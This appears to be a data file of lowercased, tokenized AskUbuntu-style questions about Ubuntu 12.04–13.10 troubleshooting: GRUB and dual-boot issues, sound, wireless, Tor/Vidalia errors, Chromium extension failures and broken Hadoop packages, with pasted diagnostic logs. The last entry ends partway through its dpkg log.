360887	is there a way to install and use smart scopes in 13.04 ?	i would like to try the smart scopes feature because this would be the only reason for me to upgrade to saucy . is there a way to try the feature ( the final version used in saucy ) in ubuntu 13.04 ? and would i be able to uninstall it if i decide i do n't like it ?
360888	sound issue in lubuntu	i 'm recently having a problem in my lubuntu deskptop : sound through the speakers does n't seem to work . the funny thing is : it works when i plug in my earphones . i 've tried to unmute everything with pavucontrol and alsamixer , but everything seems to be ok. $ sudo aplay -l **** liste der hardware-ger채te ( playback ) **** karte 0 : intel [ hda intel ] , ger채t 0 : hda generic [ hda generic ] sub-ger채te : 0/1 sub-ger채t # 0 : subdevice # 0 $ lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) subsystem : acer incorporated [ ali ] device 034a flags : bus master , fast devsel , latency 0 , irq 44 memory at 58200000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel can anyone guess what 's happening ? it has worked until recently and it definitely works in my windows partition . update : $ amixer scontents simple mixer control 'master',0 capabilities : pvolume penum playback channels : front left - front right limits : playback 0 - 64 mono : front left : playback 64 [ 100 % ] [ 0.00db ] front right : playback 64 [ 100 % ] [ 0.00db ] simple mixer control 'pcm',0 capabilities : pvolume penum playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 0 [ 0 % ] [ -51.00db ] front right : playback 0 [ 0 % ] [ -51.00db ] simple mixer control 'capture',0 capabilities : cvolume cswitch penum capture channels : front left - front right limits : capture 0 - 31 front left : capture 26 [ 84 % ] [ 22.50db ] [ on ] front right : capture 26 [ 84 % ] [ 22.50db ] [ on ] simple mixer control 'digital',0 capabilities : cvolume penum capture channels : front left - front right limits : capture 0 - 120 front left : capture 120 [ 100 % ] [ 30.00db ] front right : capture 120 [ 100 % ] [ 30.00db ] i 've recently installed avant-window-navigator , but i 've already tried deactivating it and that does n't resolve the problem . i also removed lxpanel from startup , but adding it again is no use too .
360890	vidalia detected that the tor software exited unexpectedly ? [ only vidalia no tor browser ]	i have installed the vidalia by following these instructions everything went as they mentioned . when i started vidalia it gave me the error : vidalia was unable to start tor . check your settings to ensure the correct name and location of your tor executable is specified . i found that bug here and followed their instructions to fix it and now after that it says : vidalia detected that the tor software exited unexpectedly . please check the message log for recent warning or error messages . logs of vidalia oct 18 02:15:06.937 [ notice ] tor v0.2.3.25 ( git-3fed5eb096d2d187 ) running on linux . oct 18 02:15:06.938 [ notice ] opening socks listener on 127.0.0.1:9050 oct 18 02:15:06.938 [ warning ] could not bind to 127.0.0.1:9050 : address already in use . is tor already running ? oct 18 02:15:06.938 [ warning ] /var/run/tor is not owned by this user ( waqas , 1000 ) but by debian-tor ( 118 ) . perhaps you are running tor as the wrong user ? oct 18 02:15:06.938 [ warning ] before tor can create a control socket in `` /var/run/tor/control '' , the directory `` /var/run/tor '' needs to exist , and to be accessible only by the user account that is running tor . ( on some unix systems , anybody who can list a socket can connect to it , so tor is being careful . ) oct 18 02:15:06.938 [ warning ] failed to parse/validate config : failed to bind one of the listener ports . oct 18 02:15:06.938 [ error ] reading config failed -- see warnings above . please help !
360894	will modem manager be updated in 12.04 lts to release 0.6.0 or above ?	it is still stuck at release 0.5.2 since early last year , while release 0.6.0 does not seem to be progressed to a stable release for 12.04 lts . any plans for the update to occur before the end of the year ? in a related but separate question , i note that the latest modem manager gui ( 0.0.16 ) has now been released for saucy salamander in its software center , but still with the older 0.0.13 version for precise 's software center - why does it not follow suit ?
360895	help with grub2 needed post 13.10 updgrade . grub sees my opensuse12.3 but when selected hangs with black screen .	this happened on last upgrade and i reinstalled opensuse . i want to avoid that this time . when opensuse controlled grub the options to boot either os worked fine . the ubuntu one will not work . are there grub settings i can change to get this working ? would it be better to get the opensuse grub to load , if so how can i do this . i can see the opensuse root and home directories from ubuntu ( they are on a separate hdd ) thanks
360905	content stick to fingers for external mouse ?	content stick to fingers in the settings seems to apply only to the trackpad of my laptop . how to make it also apply to an external mouse ?
360908	svn connection timeout	i have ubuntu 12.04 running in virtual box inside windows 7 . i have the network adapter set as nat and everything networking wise seems to be running smoothly ( internet / git ect. ) . however , for some reason , svn always times out when i.e michael @ michael-virtualbox : ~/documents/deleteme $ svn co svn : //svn.openwrt.org/openwrt/trunk/ svn : ca n't connect to host 'svn.openwrt.org ' : connection timed out somebody suggested to me that i might need to change what ports svn uses . does anybody have any idea how to diagnose / solve the problem ? thanks !
360910	where is recent user list in gdm3 stored ? i want to clear the list	i tried removing : /var/log/wtmp /var/log/consolekit/history the completet gnome tree in /var/lib and accountservices nothing helped . the user list ist still there . we want to have a fresh box to give to the user when tests are finished . edit : cleanup edit2 : ** it is a debian wheezy system , guess ubuntu might be different in this case **
360911	how to create a media player with a list of .mp3 files in qt	hello everyone i am new to qt-sdk . i want to create a media player with a list of .mp3 files . pls help me with some good tutorials in creating one .
360912	wireless disabled ( network manager )	am having issues with my wireless 1 my laptop had dual boot windows 7 and ubuntu 13.04 i upgraded to windows 8 and after the first 2-3 reboots all was working well in windows and ubuntu then my wireless in ubuntu stoped working saying `` wifi is disabled by hardware switch '' the hardware switch has no effect i removed network manager installed new firmwares and still nothing the wifi was not working in a moment of testing i installed wifi radar and this can detect the wireless signals and at one point it connected but still network manger still says disabled . my laptop is a hp pavilion dm4 2070us with wireless centrino n 1000 i have updated to 13.10 thinking it would fix it but still nothing
360914	black screen macbook pro 7.1 / ubuntu 13.10	ubuntu 13.10 installed ok on my macbook pro 7.1 . by default it was using the opensource video driver which just about worked ( i could log into unity ) , but froze after about 5 minutes of use each time . after trying to install the various proprietary nvidia drivers i get a black screen after reboot : refited screen : ok grub menu : ok ubuntu logo appears on screen : ok black screen : not ok
360915	what applications can i use to synchronize my rockbox media player ?	i 'm using rockbox on my ipod classic 80 gb . i 'm interested in what applications are available for ubuntu to manage my rockbox media library . can you describe what features each application has ? for example : music synchronization , podcast support , video encoding to mpeg , easy gui ... please limit your answers to 1 application per answer .
360918	how to avoid typing 'python ' when running .py scripts ?	i am experimenting with django develpment in virtualenv . it is rather anyoing that each time i should type commands like : python manage.py runserver i am wondering what should i do to run the same command without 'python ' , i.e . just : manage.py runserver
360921	how can i get my airport extreme network printer working after upgrading to ( k ) ubuntu 13.10 ?	when using ( k ) ubuntu 13.04 , my network printer worked fine . after upgrading to ( k ) ubuntu 13.10 today , i can no longer print . i get the error `` the printer is not responding . '' i 've tried to add the printer again , and it is automatically recognised . i can add it , and select it from print dialogue boxes , but i get the same error . brother hl-2040 , kubuntu 13.10 ( kde 4.11.2 ) ==edit== i attempted connecting the printer directly with a usb cable , and this worked fine , so it 's not a problem with drivers . ( fwiw i 'm using the recommended hl-2040 foomatic/hl1250 . ) further , it prints fine over the network from my wife 's macbook . ==edit 2== i 've tried another printer over a different network , and that works fine . the one that does n't work is connected over an apple airport extreme . ( although , as stated above , it used to work fine . )
360922	reinstall system using deja dup back-up from maintenance mode	well the upgrade to ubuntu 13.10 failed , seemingly because it could n't install 'tex-common ' ! i 'll file a bug report later , but in the mean time i 'm stuck in a maintenance shell : scanning for btrfs filesystems filesystem check or mount failed . a maintenance shell will now be started . control-d will terminate this shell and continue booting after re-trying filesystems . any further errors will be ignored root @ computername : ~ # i backed up my system before attempting the installation using the default backup software ( which i believe is called deja dup ) . how can i reinstall my 13.04 system from the back up which is on an external usb hard drive ? thanks . my laptop is a system76 galago ultrapro .
360924	getting list of installed programs and installing them again on another drive	i will be switching hard drives and upgrading to an ssd drive . the questions i have are : 1 ) how can i get a list of programs currently installed on my ubuntu 13.04 machine . 2 ) how can install those programs again on the new 13.10 drive without reinstalling each program one by one . thanks
360925	installation problem in ubuntu 12.04	i have windows 7 os in my laptop i want to install ubuntu 12.04 . i did so . but at the end of installation it showed an error . that is grup error . your grup crashed . your system will not boot . i do n't know what to do now
360927	13.04 ca n't type certain letters in capital , because they are bound to program functions	i ca n't type certain letters in capital , because they are bound to program functions . for example , shitft + d opens dropbox settings , when i 'm trying to type a post ( f.ex here ) . of course , capslock + d works just fine . how can i make sure that no keys are bound to the shift-key + some key , so that i can type forum posts et.c without having to use capslock to make capital letters ? probably a dumb question , but i 'm a novice . greatly appreciate any help .
360929	kubuntu 13.10 no sound , missing shutdown button , network disconnected	i just updated to kubuntu 13.10 and several things are wrong . for instance , the only output sound device is dummy output , network icon has a red x on it and shutdown and restart buttons are missing . what is wrong ?
360932	themes look all messed up	i am trying to apply themes using the gnome tweak tool . when i apply my theme in `` current theme '' and `` gtk+ theme '' it goes all weird , it almost never looks anything like the picture . i am trying to apply an all black theme with a white icon set and the top bar is white , the background for drop down menus is black with black text etc etc . any ideas ?
360938	recovering lost windows files after ubuntu install	i just installed ubuntu 13.4 and instead of choosing dual boot i overwrite my windows xp . i do n't care about xp the files there were some files on it i 'd like to get back if i could anyone point me in the right direction ? thanks , ax
360941	notebook turned off while upgrading	ok , so yesterday i was upgrading my ubuntu to 13.10 and it already started the `` getting new packages '' when my note 's battery got low and it turned off . when i turned it on , i noticed that software update settings were changed ( they all have been turned off ) and now when i am launching the software updater it starts its checking but in the the end saying that it is finished it does n't give me the list of updates , it just gets frozen . so what can i do in this case ?
360945	ubuntu 13.10 duplicates my key presses	i have upgraded from ubuntu 13.04 to 13.10 and it now constantly duplicates my key presses when i am in a browser , hud or libreoffice . so if i type `` ubuntu '' it types `` uubbuunnttuu '' . when i press backspace it eliminates two chars at once . the only exception is terminal . it behaves as usual . the problem is very frustrating , i ca n't get to work with it , please halp me .
360950	laggy ubuntu . after fresh install	i am facing a lag ubuntu os 13.04 , after a fresh install of it . i installed it using nomodeset . and after a successful install , it loads and suddenly it lags . how to fix it ? i dont want to dual boot i want single os . thanks
360951	how to change language with alt+shift ubuntu 13.10	with older ubuntu changing languages with alt+shift was easy to enable but on 13.10 i can not do this task at all can any one help me ? ?
360952	booting error on grub after backtrack installation	i have installed windows a 7 and ubuntu 13.04 already , i was trying to install backtrack but at the start of the installation , i turned the computer off because it told me it was going to boot automatically or something like this , then when i tried to open my computer again , i got this error : unknown file system . grub rescue >
360954	all chromium extensions throw errors since update to 13.10	since updating to 13.10 all chromium extensions generate errors : chrome.extension is not available : 'extension ' is not allowed for specified context type content script , extension page , web page , etc. ) . [ vm ] binding ( 56 ) :427 uncaught typeerror : can not call method 'sendrequest ' of undefined include.preload.js:105 uncaught typeerror : can not read property 'onrequest ' of undefined include.postload.js:473 get http : //edge.quantserve.com/quant.js superuser.com/:2047 get http : //www.google-analytics.com/__utm.gif ? utmwv=5.4.5 & utms=2 & utmn=590704726…n % 3d ( organic ) % 7cutmcmd % 3dorganic % 7cutmctr % 3d ( not % 2520provided ) % 3b & utmu=qq~ ga.js:61 chrome.extension is not available : 'extension ' is not allowed for specified context type content script , extension page , web page , etc. ) . [ vm ] binding ( 56 ) :427 uncaught typeerror : can not read property 'onrequest ' of undefined content.js:233 chrome.extension is not available : 'extension ' is not allowed for specified context type content script , extension page , web page , etc. ) . [ vm ] binding ( 56 ) :427 uncaught typeerror : can not read property 'onrequest ' of undefined injected.js:169 chrome.extension is not available : 'extension ' is not allowed for specified context type content script , extension page , web page , etc. ) . [ vm ] binding ( 56 ) :427 uncaught typeerror : can not call method 'geturl ' of undefined content_js_min.js:5 get http : //engine.adzerk.net/z/8476/adzerk2_2_17_47 superuser.com/:1719 uncaught typeerror : can not call method 'sendrequest ' of undefined how to fix this ?
360956	asp.net developer wanting to migrate to ubuntu	first time poster , long time admirer ... i develop a lot of asp.net web pages using umbraco and dotnetnuke . i 've decided that i want to take everything over to ubuntu and do n't mind learning new programming languages ( in fact i 'm looking forward to it ) but i do n't want to change what i do in regards to how i approach a new project . currently i use a cms to host my sites and then i build console applications to do back end stuff e.g . my current site uses a c # application to data mine a website where i use that information to remain competitive with my affiliate marketing . so what would be a good language ( s ) to learn in order to migrate successfully to ubuntu with the least amount of downtime . my understanding is that i would need to learn php for the cms websites and python for the terminal programs . but someone has mentioned i can use python for both . any ideas ? many thanks sean
360957	what is preferable way to upgrade system ?	there are ( at minimum ) two ways to upgrade ubuntu . using update manager . using apt-get upgrade ( sudo apt-get update ; sudo apt-get upgrade ) in a terminal . are those two ways equal or is one of them preferable ?
360958	i ca n't navigate in the 3d view of modo 701 in ubuntu 13.04 . is the os overriding the shortcuts somehow and how can i fix it ?	i installed luxology modo 701 on my ubuntu 13.04 but if i try to navigate the 3d via the usual key combinations alt+left/middle/right click and drag but nothing happens in the viewport . alt+right click only gives me ubuntu 's minimize/unmaximize/move/resize/always on top/cose menu and alt+left click and drag unmaximises the window and drags it around . so i assume i need to somehow get ubuntu to not override modo 's shortcuts . any idea how i do that ? thanks in advance for any help !
360963	saucy boots default with nouveau in twin gfx ( asus ux32vd ) setup	i 'm a long time ubuntu user . i 've used my current computer ( asus zenbook ux32vd ) with 12.04 and 12.10 , using bumblebee when needing the nvidia card , but defaulting to intel for better battery life . now i 've just installed ubuntu 13.10 ( gnome flavour ) , and realized , that saucy boots up using the nvidia card with nouveau driver by default . this reduces my battery life from over 4 hours to just 2.5 hours . i 'd like to switch this behavior back to what it has been , i.e . default intel , nvidia when needed . the problem is , i do n't know how to do it . can anybody here help me out ? tia , juhis
360964	how can i use my computer as a bluetooth handsfree ? ( hfp wo n't work )	i tried to connect to my computer for handsfree in my phone , but it does n't work . i know there is an software named hfp that allows my computer to be used as a headset , but if i compile it , it just gives me these errors : make all-recursive make [ 1 ] : entering directory `/home/jinoh67/trunk' making all in libhfp make [ 2 ] : entering directory `/home/jinoh67/trunk/libhfp' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/jinoh67/trunk/libhfp' making all in hfpd make [ 2 ] : entering directory `/home/jinoh67/trunk/hfpd' g++ -dhave_config_h -i . -i.. -i../include -include config.h -i/usr/include/dbus-1.0 -i/usr/lib/x86_64-linux-gnu/dbus-1.0/include -wshadow -fno-exceptions -g -wall -mt hfpd.o -md -mp -mf .deps/hfpd.tpo -c -o hfpd.o hfpd.cpp in file included from hfpd.cpp:30:0 : ../include/libhfp/bt.h : in member function ‘void libhfp : :btdevice : :disconnectall ( ) ’ : ../include/libhfp/bt.h:1081:50 : warning : converting ‘false’ to pointer type for argument 1 of ‘void libhfp : :btdevice : :__disconnectall ( libhfp : :errorinfo* ) ’ [ -wconversion-null ] in file included from ../include/libhfp/bt.h:31:0 , from hfpd.cpp:30 : ../include/libhfp/events.h : in instantiation of ‘void libhfp : :callback < void , ta1 , ta2 > : :register ( targt* , void ( targt : :* ) ( ta1 , ta2 ) ) [ with targt = handsfree ; ta1 = libhfp : :dispatchinterface : :logtype_t ; ta2 = const char* ] ’ : hfpd.cpp:183:53 : required from here ../include/libhfp/events.h:853:3 : error : ‘registerdirect’ was not declared in this scope , and no declarations were found by argument-dependent lookup at the point of instantiation [ -fpermissive ] ../include/libhfp/events.h:853:3 : note : declarations in dependent base ‘libhfp : :callbackadapter < void , libhfp : :argset < libhfp : :dispatchinterface : :logtype_t , const char* , libhfp : :nil , libhfp : :nil , libhfp : :nil , libhfp : :nil > > ’ are not found by unqualified lookup ../include/libhfp/events.h:853:3 : note : use ‘this- > registerdirect’ instead make [ 2 ] : *** [ hfpd.o ] error 1 make [ 2 ] : leaving directory `/home/jinoh67/trunk/hfpd' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/jinoh67/trunk' make : *** [ all ] error 2 if i try to correct the error with a workaround , it gives me another bunch of errors : ( is there any other software that allows me to do this ? or should i modify the kernel or change the adapter ( which is built-in ) ? edit : i added a ppa repository http : //ppa.launchpad.net/sebastian-ruehl/nohands/ubuntu natty main , of course i did apt-get update ; apt-get upgrade and installed libhfp hfpd hfconsole libaudiofile0 libspeexdsp1 libdbus-1-3 libasound2 subversion g++ autoconf libtool libspeexdsp-dev libasound2-dev libbluetooth-dev libaudiofile-dev libdbus-1-dev , but it says e : package `libaudiofile0` has no installation candidate . i googled libaudiofile0 for quantal , but it looks like there is no such thing like that .
360966	my pc freezes when i connect to the internet with my iburst usb modem	i 'm having some trouble with iburst usb modem . i followed these instructions , and now it seems i can connect to the internet , but when i try to connect my whole desktop freezes . when i boot into ubuntu with my modem connected all is well until i try to open firefox then my desktop freezes as well . i used graham inngs ' ibdriver in dkms format solution and it worked apart from the freezing . graham inggs made a patch for this problem for older linux versions but i ca n't seem to find anything compatible with 12.04 .
360967	vmware workstation 8 ca n't find the headers directory	i 'm having an issue with vmware workstation 8 . i installed it but when i run it , it shows this window : but , when i press on `` browse '' , this window comes up even if i select the linux-headers-3.8.0-31-generic folder , it says that it ca n't find the c headers for that kernel . why ? p.s . i already tried sudo apt-get install linux-headers-3.8.0-31-generic and the terminal says that the kernel is up to date .
360969	the volume `` filesystem root '' has only 533.9 mb disk space remaining	i have run into this problem two days ago . the os warns me that root has limited disk space ; however this should not be the case since i have 3 separate logical partitions for ubuntu . also it allows me to click the button examine , but i am not able to locate the problem that way ? what can i do and what is the remedy ? inform me if further information is required . thanks for your assistance can i somehow include /usr directory in another mount point or the partition for the home folder without risking losing my data ? the culprit seems to be the /usr directory . the problem occurred after a full texlive latex installation . the output of lsblk is as follows :
360970	usb network adaptor problem in ubuntu 12.04lts	i installed ubuntu 12.04 . i have dlink usb adaptor and it is not recognized . how can i get internet on my pc
360971	how can i get terminal transparency with tilda to work ?	i like tilda terminal , however it does n't work well for me . i installed it on desktop and laptop with the same settings and the same level of transparency - 50 . the problem is on the desktop as a transparent background i do see the previous application , however on the laptop i see just the standard picture of my ubuntu desktop . do you know how to fix it ?
360972	does 'sync between computers ' allow you to choose which applications ?	i 've been finding out more about how it works , but i 'm still too chicken to use it . i have a fresh 13.04 on a new computer , and 12.04 on the other which includes many things that i do n't want to install on the new computer . i 'm just trying to work out if i can choose which applications from my old computer i will install on the new computer , or if it 's only sync all or nothing . anyone know ? i 've never used it . i do n't want to find out that it 's syncing loads of applications that i do n't want on the new computer .
360973	what is the difference between ubuntu phone and ubuntu touch ?	several days ago , ubuntu 13.10 was released for desktops , servers , phones , etc . on the ubuntu website , ubuntu for phones is listed as officially available for the gsm galaxy nexus ( codenames takju and yakju ) and the nexus 4 . the main installation process is for linux only . if you scroll down the site you will find under the section `` further information '' a link to - > `` manual download and installation instructions '' . if you follow the link you will be redirected to the ubuntu wiki page for for ubuntu touch . here there is a list of supported devices , which in addition to the above mentioned devices , includes the nexus 7 2012 and nexus 10 . so i am looking for .img files that i can flash with fastboot . on the wiki site there is a section called `` manual download & installation '' which contains a link to a download site where there are .img and .zip files . these files are for13.10 and where updated 17-oct-2013 . so , what is the difference between ubuntu for phones and ubuntu touch , and why does the official ubuntu website not have installation instructions .img files that could be used with fastboo on windows ? i can set up a ubuntu vm , but many people ca n't .
360979	dual-booting ubuntu and backtrack on a external hdd	now i would like to install ubuntu and backtrack on the same external hard drive . i do not want ubuntu live , because i use it often and i need it installed . however , i do n't care about backtrack . i also need a swap and a windows partition for windows access . im giving backtrack 7 gb , ubuntu 15gb and swap 1gb , the rest is for the windows partition ( total of 111gb ) the problem when installing : backtrack is having problems installing and every time it says grub failed and when booting it says `` grub rescue '' . this is due to me installing grub on a logical partition and not on the first partition . so when mbr loads grub it points to the wrong partition , but i still need it on a logical partition as i will explain further below . when using it live : *grub* has a problem with syslinux and they over write each other and then do n't recognize one another so its one or the other . my solutions i 'm new to the whole boot thing and studied all this yesterday so correct me if im wrong : ubuntu uses grub , and all live cd use syslinux ( i would also like to know the difference between isolinux and syslinux ) . the bios loads the ipl part of the mbr and that is where grub ( or syslinux ) is , in the first byte of the first partition . and that 's also where syslinux ( or grub ) goes and they over write each other . well i thought how about making an *extended partition and put ubuntu and backtrack in logical partitions and then set their boot loader to their own logical partition . so that would mean : syslinux would be on sdb5 and grub would be on sdb6 however if i do that then i would need a third program to be written in the ipl of the mbr so that it would load the other two from sdb5 and sdb6 ( these are just examples ) my question is any of this possible ? and what would be the bootloader that would load syslinux and grub how would install backtrack and syslinux on sdx n with universal usb installer or unetbootin ( i thought maybe if i left all the other space unformated then windows would just recognize the one partition and install bt there , but what about syslinux ? ) and sorry i made it so long , if anyone has any suggestions do not hold back . i 'm at a dead end here so please help me . info : ubuntu 13.04 backtrack5 r1 gnome i 'm running windows 7 and ubuntu 13.04 i already have ubuntu live and backtrack live usb and what i wrote up there was the extent of my knowledge of bootloaders , so please do n't think i 'm one of those extreme tech people , and please give a little detail and not just `` install grub on the mbr '' . i do n't know anything about any bootloaders specially grub .
360980	not detecting my grafic / display hardware after upgrade to 13.10	can anyone help me please , i upgraded to 13.10 an my graphic card an display are no longer detected , when i want to login . i see a window that say that i have to configure them myself but after i select that i want to configure it myself , i only see the non grafical login screen . sometimes i see a window that say that i have to wait one minute to configure my hardware but nothing happens . please help me because i dont want to work with windows ... ...
360981	ssh-agent stopped working after upgrade to 13.10	my ssh is asking for my keys everytime i try to log onto my servers , this is happening after i upgraded my ubuntu from 13.04 to 13.10 , before that it unlocked my keys at my session login , but now it 's not working . how can i reset the mechanism that takes care of my keys ? thanks ! update : solved with this two commands gnome-keyring-daemon -s ssh-add -d
360983	ca n't shut down or restart after 13.10 upgrade	i have just upgraded to ubuntu 13.10 , and when i try to shut down the system , by using the up-right button of the screen , nothing happens . i have to switch off the computer manualy . can anyone help me ?
360986	curious about executable files	i 'm just curious . will ubuntu be able to open executable files without using extra software or terminal ?
360988	ca n't see when using livedvd , blind booting	i have 8 discs , currently . all ltss , half 32-bit , half 64-bit , half kde , half gnome . the 32-bit ones , my computer ca n't read . the 64-bit ones work , but the pixels are extremely messed up . everything is scrambled for some reason . i press up and down and i can see things happening , but i do n't know what . so , i need to know how to do this blindly . which option , in the boot menu of 12.04 , will start the bootfromdvd ? first one down ? second one down ? i press down how many times ? then , once i press enter or right , what do i press ? guide the blind man through the maze . thanks !
360989	atheros ar9485 vs ubuntu 12.04	i 've read a lot of threads about in the forum but none of them solved my problem . i have got a ar9485 that works perfectly but if the net ask for a password . wep , wap ... everything that make me to log in , automatically put me out of range from that net and set my card in blank . if i try to connect a no-secure wifi i get no problem at all . any idea ? thanks a lot .
360990	dependency problems while installing or updating software	i was trying to install hadoop ( single node pseudo cluster mode ) on ubuntu 12.04 ( 3.2 ) . i tried various methods but could n't get it to work . one of the ways i tried was to install cdh3 and chd4 packages provided by cloudera . while trying out cdh , i first installed cdh3 , then uninstalled it , then installed cdh4 and then uninstalled it as well - as it was not working either . right after this , the system started throwing errors whenever i try to install or update any other software . the error log generated while installing pdf mod : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory selecting previously unselected package cli-common . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 268418 files and directories currently installed . ) unpacking cli-common ( from ... /cli-common_0.8.2_all.deb ) ... selecting previously unselected package libmono-system-xml4.0-cil . unpacking libmono-system-xml4.0-cil ( from ... /libmono-system-xml4.0-cil_2.10.8.1- 1ubuntu2.2_all.deb ) ... selecting previously unselected package libmono-system-security4.0-cil . unpacking libmono-system-security4.0-cil ( from ... /libmono-system-security4.0- cil_2.10.8.1-1ubuntu2.2_all.deb ) ... selecting previously unselected package libmono-system-configuration4.0-cil . unpacking libmono-system-configuration4.0-cil ( from ... /libmono-system- configuration4.0-cil_2.10.8.1-1ubuntu2.2_all.deb ) ... selecting previously unselected package libmono-system4.0-cil . unpacking libmono-system4.0-cil ( from ... /libmono-system4.0-cil_2.10.8.1- 1ubuntu2.2_all.deb ) ... selecting previously unselected package libmono-security4.0-cil . unpacking libmono-security4.0-cil ( from ... /libmono-security4.0-cil_2.10.8.1- 1ubuntu2.2_all.deb ) ... selecting previously unselected package mono-4.0-gac . unpacking mono-4.0-gac ( from ... /mono-4.0-gac_2.10.8.1-1ubuntu2.2_all.deb ) ... selecting previously unselected package mono-gac . unpacking mono-gac ( from ... /mono-gac_2.10.8.1-1ubuntu2.2_all.deb ) ... selecting previously unselected package mono-runtime . unpacking mono-runtime ( from ... /mono-runtime_2.10.8.1-1ubuntu2.2_amd64.deb ) ... selecting previously unselected package libmono-corlib4.0-cil . unpacking libmono-corlib4.0-cil ( from ... /libmono-corlib4.0-cil_2.10.8.1- 1ubuntu2.2_all.deb ) ... selecting previously unselected package libglib2.0-cil . unpacking libglib2.0-cil ( from ... /libglib2.0-cil_2.12.10-2ubuntu4_amd64.deb ) ... selecting previously unselected package libgconf2.0-cil . unpacking libgconf2.0-cil ( from ... /libgconf2.0-cil_2.24.2-1_all.deb ) ... selecting previously unselected package libgdiplus . unpacking libgdiplus ( from ... /libgdiplus_2.10-3_amd64.deb ) ... selecting previously unselected package libmono-cairo4.0-cil . unpacking libmono-cairo4.0-cil ( from ... /libmono-cairo4.0-cil_2.10.8.1- 1ubuntu2.2_all.deb ) ... selecting previously unselected package libmono-system-drawing4.0-cil . unpacking libmono-system-drawing4.0-cil ( from ... /libmono-system-drawing4.0- cil_2.10.8.1-1ubuntu2.2_all.deb ) ... selecting previously unselected package libgtk2.0-cil . unpacking libgtk2.0-cil ( from ... /libgtk2.0-cil_2.12.10-2ubuntu4_amd64.deb ) ... selecting previously unselected package libmono-corlib2.0-cil . unpacking libmono-corlib2.0-cil ( from ... /libmono-corlib2.0-cil_2.10.8.1- 1ubuntu2.2_all.deb ) ... selecting previously unselected package libmono-i18n-west2.0-cil . unpacking libmono-i18n-west2.0-cil ( from ... /libmono-i18n-west2.0-cil_2.10.8.1- 1ubuntu2.2_all.deb ) ... selecting previously unselected package libmono-i18n4.0-cil . unpacking libmono-i18n4.0-cil ( from ... /libmono-i18n4.0-cil_2.10.8.1- 1ubuntu2.2_all.deb ) ... selecting previously unselected package libmono-i18n-west4.0-cil . unpacking libmono-i18n-west4.0-cil ( from ... /libmono-i18n-west4.0-cil_2.10.8.1- 1ubuntu2.2_all.deb ) ... selecting previously unselected package libmono-posix4.0-cil . unpacking libmono-posix4.0-cil ( from ... /libmono-posix4.0-cil_2.10.8.1- 1ubuntu2.2_all.deb ) ... selecting previously unselected package libmono-system-core4.0-cil . unpacking libmono-system-core4.0-cil ( from ... /libmono-system-core4.0-cil_2.10.8.1- 1ubuntu2.2_all.deb ) ... selecting previously unselected package pdfmod . unpacking pdfmod ( from ... /pdfmod_0.9.1-5ubuntu1_all.deb ) ... processing triggers for man-db ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... setting up hadoop ( 2.0.0+1475-1.cdh4.4.0.p0.23~precise-cdh4.4.0 ) ... chown : invalid group : `root : hadoop' dpkg : error processing hadoop ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of hadoop-hdfs : hadoop-hdfs depends on hadoop ( = 2.0.0+1475-1.cdh4.4.0.p0.23~precise-cdh4.4.0 ) ; however : package hadoop is not configured yet . dpkg : error processing hadoop-hdfs ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of hadoop-hdfs-datanode : hadoop-hdfs-datanode depends on hadoop-hdfs ( = 2.0.0+1475-1.cdh4.4.0.p0.23~precise- cdh4.4.0 ) ; however : package hadoop-hdfs is not configured yet . dpkg : error processing hadoop-hdfs-datanode ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of hadoop-hdfs-namenode : hadoop-hdfs-namenode depends on hadoop-hdfs ( = 2.0.0+1475-1.cdh4.4.0.p0.23~precise-cdh4.4.0 ) ; however : package hadoop-hdfs is not configured yet . dpkg : error processing hadoop-hdfs-namenode ( -- configno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already ure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of hadoop-hdfs-secondarynamenode : hadoop-hdfs-secondarynamenode depends on hadoop-hdfs ( = 2.0.0+1475- 